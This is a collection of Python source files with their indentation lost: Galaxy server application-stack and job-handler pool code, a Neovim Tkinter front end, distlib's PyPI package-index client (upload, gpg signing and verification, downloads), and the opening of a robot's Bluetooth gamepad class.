def get_app_kwds(cls, config_section, app_name=None, for_paste_app=False):
return {}
@classmethod
def register_postfork_function(cls, f, *args, **kwargs):
f(*args, **kwargs)
def __init__(self, app=None, config=None):
self.app = app
self.config = config or (app and app.config)
self.running = False
self._supports_returning = None
self._supports_skip_locked = None
self._preferred_handler_assignment_method = None
multiprocessing.current_process().name = getattr(self.config, "server_name", "main")
if app:
log.debug("%s initialized", self.__class__.__name__)
def supports_returning(self):
if self._supports_returning is None:
job_table = self.app.model.Job.__table__
stmt = job_table.update().where(job_table.c.id == -1).returning(job_table.c.id)
try:
self.app.model.session.execute(stmt)
self._supports_returning = True
except Exception:
self._supports_returning = False
return self._supports_returning
def supports_skip_locked(self):
if self._supports_skip_locked is None:
job_table = self.app.model.Job.__table__
stmt = job_table.select().where(job_table.c.id == -1).with_for_update(skip_locked=True)
try:
self.app.model.session.execute(stmt)
self._supports_skip_locked = True
except Exception:
self._supports_skip_locked = False
return self._supports_skip_locked
def get_preferred_handler_assignment_method(self):
if self._preferred_handler_assignment_method is None:
if self.app.application_stack.supports_skip_locked():
self._preferred_handler_assignment_method = HANDLER_ASSIGNMENT_METHODS.DB_SKIP_LOCKED
else:
log.debug(
"Database does not support WITH FOR UPDATE statement, cannot use DB-SKIP-LOCKED handler assignment"
)
self._preferred_handler_assignment_method = HANDLER_ASSIGNMENT_METHODS.DB_TRANSACTION_ISOLATION
return self._preferred_handler_assignment_method
def _set_default_job_handler_assignment_methods(self, job_config, base_pool):
"""Override in subclasses to set default job handler assignment methods if not explicitly configured by the administrator.
Called once per job_config.
"""
def _init_job_handler_assignment_methods(self, job_config, base_pool):
if not job_config.handler_assignment_methods_configured:
self._set_default_job_handler_assignment_methods(job_config, base_pool)
def _init_job_handler_subpools(self, job_config, base_pool):
"""Set up members of "subpools" ("base_pool.*") as handlers (including the base pool itself, if it exists)."""
for pool_name in self.configured_pools:
if pool_name == base_pool:
tag = job_config.DEFAULT_HANDLER_TAG
elif pool_name.startswith(f"{base_pool}."):
tag = pool_name.replace(f"{base_pool}.", "", 1)
else:
continue
# Pools are hierarchical (so that you can have e.g. workflow schedulers use the job handlers pool if no
# workflow schedulers pool exists), so if a pool for a given tag has already been found higher in the
# hierarchy, don't add members from a pool lower in the hierarchy.
if tag not in job_config.pool_for_tag:
if self.in_pool(pool_name):
job_config.is_handler = True
for handler in self.pool_members(pool_name):
job_config.add_handler(handler, [tag])
job_config.pool_for_tag[tag] = pool_name
def init_job_handling(self, job_config):
"""Automatically add pools as handlers if they are named per predefined names and there is not an explicit
job handler assignment configuration.
Also automatically set the preferred assignment method if pool handlers are found and an assignment method is
not explicitly configured by the administrator.
"""
stack_assignment_methods_configured = False
for base_pool in job_config.DEFAULT_BASE_HANDLER_POOLS:
if self.has_base_pool(base_pool):
if not stack_assignment_methods_configured:
self._init_job_handler_assignment_methods(job_config, base_pool)
stack_assignment_methods_configured = True
self._init_job_handler_subpools(job_config, base_pool)
def init_late_prefork(self):
pass
def log_startup(self):
log.info(f"Galaxy server instance '{self.config.server_name}' is running")
def start(self):
# TODO: with a stack config the pools could be parsed here
pass
def allowed_middleware(self, middleware):
if hasattr(middleware, "__name__"):
middleware = middleware.__name__
return middleware not in self.prohibited_middleware
def workers(self):
return []
@property
def pool_name(self):
# TODO: ideally jobs would be mappable to handlers by pool name
return None
@property
def configured_pools(self):
return {}
def has_base_pool(self, pool_name):
return self.has_pool(pool_name) or any(pool.startswith(f"{pool_name}.") for pool in self.configured_pools)
def has_pool(self, pool_name):
return pool_name in self.configured_pools
def in_pool(self, pool_name):
return False
def pool_members(self, pool_name):
return None
@property
def facts(self):
facts = get_facts(config=self.config)
facts.update({"pool_name": self.pool_name})
return facts
def set_postfork_server_name(self, app):
new_server_name = self.server_name_template.format(**self.facts)
if "GUNICORN_WORKER_ID" in os.environ:
new_server_name = f"{new_server_name}.{os.environ['GUNICORN_WORKER_ID']}"
multiprocessing.current_process().name = app.config.server_name = new_server_name
log.debug("server_name set to: %s", new_server_name)
def shutdown(self):
pass
class WebApplicationStack(ApplicationStack):
name = "Web"
class GunicornApplicationStack(ApplicationStack):
name = "Gunicorn"
do_post_fork = "--preload" in os.environ.get("GUNICORN_CMD_ARGS", "") or "--preload" in sys.argv
postfork_functions: List[Callable] = []
# Will be set to True by external hook
late_postfork_event = threading.Event()
@classmethod
def register_postfork_function(cls, f, *args, **kwargs):
# do_post_fork determines if we need to run postfork functions
if cls.do_post_fork:
# if so, we call ApplicationStack.late_postfork once after forking ...
if not cls.postfork_functions:
os.register_at_fork(after_in_child=cls.late_postfork)
# ... and store everything we need to run in ApplicationStack.postfork_functions
cls.postfork_functions.append(lambda: f(*args, **kwargs))
else:
f(*args, **kwargs)
@classmethod
def run_postfork(cls):
cls.late_postfork_event.wait(1)
for f in cls.postfork_functions:
f()
@classmethod
def late_postfork(cls):
# We can't run postfork functions immediately, because this is before the gunicorn `post_fork` hook runs,
# and we depend on the `post_fork` hook to set a worker id.
t = threading.Thread(target=cls.run_postfork)
t.start()
def log_startup(self):
msg = [f"Galaxy server instance '{self.config.server_name}' is running"]
if "GUNICORN_LISTENERS" in os.environ:
msg.append(f'serving on {os.environ["GUNICORN_LISTENERS"]}')
log.info("\n".join(msg))
class WeblessApplicationStack(ApplicationStack):
name = "Webless"
def _set_default_job_handler_assignment_methods(self, job_config, base_pool):
# We will only get here if --attach-to-pool has been set so it is safe to assume that this handler is dynamic
# and that we want to use one of the DB serialization methods.
#
# Disable DB_SELF if a valid pool is configured. Use DB "SKIP LOCKED" if the DB engine supports it, transaction
# isolation if it doesn't, or DB_PREASSIGN if the job_config doesn't allow either.
conf_class_name = job_config.__class__.__name__
remove_methods = [HANDLER_ASSIGNMENT_METHODS.DB_SELF]
add_method = self.get_preferred_handler_assignment_method()
log.debug(
"%s: No job handler assignment methods were configured but this server is configured to attach to the"
" '%s' pool, automatically enabling the '%s' assignment method",
conf_class_name,
base_pool,
add_method,
)
for m in remove_methods:
try:
job_config.handler_assignment_methods.remove(m)
log.debug(
"%s: Removed '%s' from handler assignment methods due to use of --attach-to-pool",
conf_class_name,
m,
)
except ValueError:
pass
if add_method not in job_config.handler_assignment_methods:
job_config.handler_assignment_methods.insert(0, add_method)
log.debug(
"%s: handler assignment methods updated to: %s",
conf_class_name,
", ".join(job_config.handler_assignment_methods),
)
def __init__(self, app=None, config=None):
super().__init__(app=app, config=config)
if self.app and self.config and self.config.attach_to_pools:
log.debug("Will attach to pool(s): %s", ", ".join(self.config.attach_to_pools))
@property
def configured_pools(self):
return {p: self.config.server_name for p in self.config.attach_to_pools}
def in_pool(self, pool_name):
return pool_name in self.config.attach_to_pools
def pool_members(self, pool_name):
return (self.config.server_name,) if self.in_pool(pool_name) else None
def application_stack_class() -> Type[ApplicationStack]:
"""Returns the correct ApplicationStack class for the stack under which
this Galaxy process is running.
"""
if "gunicorn" in os.environ.get("SERVER_SOFTWARE", ""):
return GunicornApplicationStack
elif os.environ.get("IS_WEBAPP") == "1":
return WebApplicationStack
return WeblessApplicationStack
def application_stack_instance(app=None, config=None) -> ApplicationStack:
stack_class = application_stack_class()
return stack_class(app=app, config=config)
def application_stack_log_filter():
return application_stack_class().log_filter_class()
def application_stack_log_formatter():
return logging.Formatter(fmt=application_stack_class().log_format)
def register_postfork_function(f, *args, **kwargs):
application_stack_class().register_postfork_function(f, *args, **kwargs)
def get_app_kwds(config_section, app_name=None):
return application_stack_class().get_app_kwds(config_section, app_name=app_name)
|
tarruda.py
|
"""Neovim TKinter UI."""
import sys
from Tkinter import Canvas, Tk
from collections import deque
from threading import Thread
# import StringIO, cProfile, pstats
from neovim import attach
from tkFont import Font
SPECIAL_KEYS = {
'Escape': 'Esc',
'Return': 'CR',
'BackSpace': 'BS',
'Prior': 'PageUp',
'Next': 'PageDown',
'Delete': 'Del',
}
if sys.version_info < (3, 0):
range = xrange
class NvimTk(object):
"""Wraps all nvim/tk event handling."""
def __init__(self, nvim):
"""Initialize with a Nvim instance."""
self._nvim = nvim
self._attrs = {}
self._nvim_updates = deque()
self._canvas = None
self._fg = '#000000'
self._bg = '#ffffff'
def run(self):
"""Start the UI."""
self._tk_setup()
t = Thread(target=self._nvim_event_loop)
t.daemon = True
t.start()
self._root.mainloop()
def _tk_setup(self):
self._root = Tk()
self._root.bind('<<nvim_redraw>>', self._tk_nvim_redraw)
self._root.bind('<<nvim_detach>>', self._tk_nvim_detach)
self._root.bind('<Key>', self._tk_key)
def _tk_nvim_redraw(self, *args):
update = self._nvim_updates.popleft()
for update in update:
handler = getattr(self, '_tk_nvim_' + update[0])
for args in update[1:]:
handler(*args)
def _tk_nvim_detach(self, *args):
self._root.destroy()
def _tk_nvim_resize(self, width, height):
self._tk_redraw_canvas(width, height)
def _tk_nvim_clear(self):
self._tk_clear_region(0, self._height - 1, 0, self._width - 1)
def _tk_nvim_eol_clear(self):
row, col = (self._cursor_row, self._cursor_col,)
self._tk_clear_region(row, row, col, self._scroll_right)
def _tk_nvim_cursor_goto(self, row, col):
self._cursor_row = row
self._cursor_col = col
def _tk_nvim_cursor_on(self):
pass
def _tk_nvim_cursor_off(self):
pass
def _tk_nvim_mouse_on(self):
pass
def _tk_nvim_mouse_off(self):
pass
def _tk_nvim_insert_mode(self):
pass
def _tk_nvim_normal_mode(self):
pass
def _tk_nvim_set_scroll_region(self, top, bot, left, right):
self._scroll_top = top
self._scroll_bot = bot
self._scroll_left = left
self._scroll_right = right
def _tk_nvim_scroll(self, count):
top, bot = (self._scroll_top, self._scroll_bot,)
left, right = (self._scroll_left, self._scroll_right,)
if count > 0:
destroy_top = top
destroy_bot = top + count - 1
move_top = destroy_bot + 1
move_bot = bot
fill_top = move_bot + 1
fill_bot = fill_top + count - 1
else:
destroy_top = bot + count + 1
destroy_bot = bot
move_top = top
move_bot = destroy_top - 1
fill_bot = move_top - 1
fill_top = fill_bot + count + 1
# destroy items that would be moved outside the scroll region after
# scrolling
# self._tk_clear_region(destroy_top, destroy_bot, left, right)
# self._tk_clear_region(move_top, move_bot, left, right)
self._tk_destroy_region(destroy_top, destroy_bot, left, right)
self._tk_tag_region('move', move_top, move_bot, left, right)
self._canvas.move('move', 0, -count * self._rowsize)
self._canvas.dtag('move', 'move')
# self._tk_fill_region(fill_top, fill_bot, left, right)
def _tk_nvim_highlight_set(self, attrs):
self._attrs = attrs
def _tk_nvim_put(self, data):
# choose a Font instance
font = self._fnormal
if self._attrs.get('bold', False):
font = self._fbold
if self._attrs.get('italic', False):
font = self._fbolditalic if font == self._fbold else self._fitalic
# colors
fg = "#{0:0{1}x}".format(self._attrs.get('foreground', self._fg), 6)
bg = "#{0:0{1}x}".format(self._attrs.get('background', self._bg), 6)
# get the "text" and "rect" which correspond to the current cell
x, y = self._tk_get_coords(self._cursor_row, self._cursor_col)
items = self._canvas.find_overlapping(x, y, x + 1, y + 1)
if len(items) != 2:
# caught part the double-width character in the cell to the left,
# filter items which dont have the same horizontal coordinate as
# "x"
predicate = lambda item: self._canvas.coords(item)[0] == x
items = filter(predicate, items)
# rect has lower id than text, sort to unpack correctly
rect, text = sorted(items)
self._canvas.itemconfig(text, fill=fg, font=font, text=data or ' ')
self._canvas.itemconfig(rect, fill=bg)
self._tk_nvim_cursor_goto(self._cursor_row, self._cursor_col + 1)
def _tk_nvim_bell(self):
self._root.bell()
def _tk_nvim_update_fg(self, fg):
self._fg = "#{0:0{1}x}".format(fg, 6)
def _tk_nvim_update_bg(self, bg):
self._bg = "#{0:0{1}x}".format(bg, 6)
def _tk_redraw_canvas(self, width, height):
if self._canvas:
self._canvas.destroy()
self._fnormal = Font(family='Monospace', size=13)
self._fbold = Font(family='Monospace', weight='bold', size=13)
self._fitalic = Font(family='Monospace', slant='italic', size=13)
self._fbolditalic = Font(family='Monospace', weight='bold',
slant='italic', size=13)
self._colsize = self._fnormal.measure('A')
self._rowsize = self._fnormal.metrics('linespace')
self._canvas = Canvas(self._root, width=self._colsize * width,
height=self._rowsize * height)
self._tk_fill_region(0, height - 1, 0, width - 1)
self._cursor_row = 0
self._cursor_col = 0
self._scroll_top = 0
self._scroll_bot = height - 1
self._scroll_left = 0
self._scroll_right = width - 1
self._width, self._height = (width, height,)
self._canvas.pack()
def _tk_fill_region(self, top, bot, left, right):
# create columns from right to left so the left columns have a
# higher z-index than the right columns. This is required to
# properly display characters that cross cell boundary
for rownum in range(bot, top - 1, -1):
for colnum in range(right, left - 1, -1):
x1 = colnum * self._colsize
y1 = rownum * self._rowsize
x2 = (colnum + 1) * self._colsize
y2 = (rownum + 1) * self._rowsize
# for each cell, create two items: The rectangle is used for
# filling background and the text is for cell contents.
self._canvas.create_rectangle(x1, y1, x2, y2,
fill=self._background, width=0)
self._canvas.create_text(x1, y1, anchor='nw',
font=self._fnormal, width=1,
fill=self._foreground, text=' ')
def _tk_clear_region(self, top, bot, left, right):
self._tk_tag_region('clear', top, bot, left, right)
self._canvas.itemconfig('clear', fill=self._bg)
self._canvas.dtag('clear', 'clear')
def _tk_destroy_region(self, top, bot, left, right):
self._tk_tag_region('destroy', top, bot, left, right)
self._canvas.delete('destroy')
self._canvas.dtag('destroy', 'destroy')
def _tk_tag_region(self, tag, top, bot, left, right):
x1, y1 = self._tk_get_coords(top, left)
x2, y2 = self._tk_get_coords(bot, right)
self._canvas.addtag_overlapping(tag, x1, y1, x2 + 1, y2 + 1)
def _tk_get_coords(self, row, col):
x = col * self._colsize
y = row * self._rowsize
return x, y
def _tk_key(self, event):
if 0xffe1 <= event.keysym_num <= 0xffee:
# this is a modifier key, ignore. Source:
# https://www.tcl.tk/man/tcl8.4/TkCmd/keysyms.htm
return
# Translate to Nvim representation of keys
send = []
if event.state & 0x1:
send.append('S')
if event.state & 0x4:
send.append('C')
if event.state & (0x8 | 0x80):
send.append('A')
special = len(send) > 0
key = event.char
if _is_invalid_key(key):
special = True
key = event.keysym
send.append(SPECIAL_KEYS.get(key, key))
send = '-'.join(send)
if special:
send = '<' + send + '>'
nvim = self._nvim
nvim.session.threadsafe_call(lambda: nvim.input(send))
def _nvim_event_loop(self):
self._nvim.session.run(self._nvim_request,
self._nvim_notification,
lambda: self._nvim.attach_ui(80, 24))
self._root.event_generate('<<nvim_detach>>', when='tail')
def _nvim_request(self, method, args):
raise Exception('This UI does not implement any methods')
def _nvim_notification(self, method, args):
if method == 'redraw':
self._nvim_updates.append(args)
self._root.event_generate('<<nvim_redraw>>', when='tail')
def _is_invalid_key(c):
try:
return len(c.decode('utf-8')) != 1 or ord(c[0]) < 0x20
except UnicodeDecodeError:
return True
nvim = attach('child', argv=['../neovim/build/bin/nvim', '--embed'])
ui = NvimTk(nvim)
# pr = cProfile.Profile()
# pr.enable()
ui.run()
# pr.disable()
# s = StringIO.StringIO()
# ps = pstats.Stats(pr, stream=s)
# ps.strip_dirs().sort_stats('ncalls').print_stats(15)
# print s.getvalue()
|
index.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__);logger.disabled=True
DEFAULT_INDEX = 'https://pypi.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
with open(os.devnull, 'w') as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ('gpg', 'gpg2'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from distutils.core import Distribution
from distutils.config import PyPIRCCommand
d = Distribution()
return PyPIRCCommand(d)
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils, getting
PyPI to do the actual work. This populates ``username``, ``password``,
``realm`` and ``url`` attributes from the configuration.
"""
# get distutils to do the work
c = self._get_pypirc_command()
c.repository = self.url
cfg = c._read_pypirc()
self.username = cfg.get('username')
self.password = cfg.get('password')
self.realm = cfg.get('realm', 'pypi')
self.url = cfg.get('repository', self.url)
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
Again, distutils is used to do the actual work.
"""
self.check_credentials()
# get distutils to do the work
c = self._get_pypirc_command()
c._store_pypirc(self.username, self.password)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
def run_command(self, cmd, input_data=None):
"""
Run a command in a child process , passing it any input data specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
data to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if input_data is not None:
kwargs['stdin'] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protocol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(d.items(), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'index.html')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from an URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
done during download and checking that the downloaded data
matched any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuple.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
rpc_proxy = ServerProxy(self.url, timeout=3.0)
try:
return rpc_proxy.search(terms, operator or 'and')
finally:
rpc_proxy('close')()
|
gamepad.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020-2021 by Murray Altheim. All rights reserved. This file is part
# of the Robot Operating System project, released under the MIT License. Please
# see the LICENSE file included as part of this package.
#
# author: Murray Altheim
# created: 2020-08-05
# modified: 2020-08-06
#
# This class interprets the signals arriving from the 8BitDo N30 Pro gamepad,
# a paired Bluetooth device. Note that supporting classes are found at the
# bottom of this file.
#
import os, sys, time
from threading import Thread
import datetime as dt
from enum import Enum
from evdev import InputDevice, ecodes
from colorama import init, Fore, Style
init()
from lib.logger import Logger, Level
from lib.event import Event
from lib.rate import Rate
'''
Pairing and using a bluetooth gamepad device:
1. prior to pairing your gamepad, list the current devices using:
% ls /dev/input
2. connect and pair the gamepad, then repeat the previous command. You'll
notice a new device, e.g., "/dev/input/event6". This is likely your
gamepad. You may need to check which of the devices was most recently
changed to determine this, it isn't always the highest number.
3. set the value of gamepad:device_path in the config.yaml file to the
value of your gamepad device.
4. be sure your gamepad is paired prior to starting ros.
If everything seems all wired up but you're not getting a response from
your gamepad, you may have configured a connection to the wrong device.
This class based on information found at:
https://core-electronics.com.au/tutorials/using-usb-and-bluetooth-controllers-with-python.html
'''
# ..............................................................................
class Gamepad():
_NOT_AVAILABLE_ERROR = 'gamepad device not found (not configured, paired, powered or otherwise available)'
def __init__(self, config, message_bus, message_factory, level):
'''
Parameters:
config: the YAML-based application configuration
message_bus: the message bus to receive messages from this task
message_factory: the factory for creating messages
mutex: vs godzilla
'''
if config is None:
raise ValueError('no configuration provided.')
self._level = level
self._log = Logger("gamepad", level)
self._log.info('initialising...')
self._config = config
_config = config['ros'].get('gamepad')
# config
_loop_freq_hz = _config.get('loop_freq_hz')
self._rate = Rate(_loop_freq_hz)
self._device_path = _config.get('device_path')
self._message_bus = message_bus
self._message_factory = message_factory
self._gamepad_closed = False
self._closed = False
self._enabled = False
self._thread = None
self._gamepad = None
# ..........................................................................
def connect(self):
'''
Scan for likely gamepad device, and if found, connect.
Otherwise we raise an OSError.
'''
_scan = GamepadScan(self._config, self._level)
_matches = _scan.check_gamepad_device()
if not _matches:
self._log.warning('no connection attempted: gamepad is not the most recent device (configured at: {}).'.format(self._device_path ))
raise OSError('no gamepad available.')
else:
self._connect()
# ..........................................................................
def has_connection(self):
return self._gamepad != None
# ..........................................................................
def _connect(self):
self._log.heading('gamepad','Connecting Gamepad...',None)
try:
self._gamepad = InputDevice(self._device_path)
# display device info
self._log.info(Fore.GREEN + "gamepad: {}".format(self._gamepad))
self._log.info('connected.')
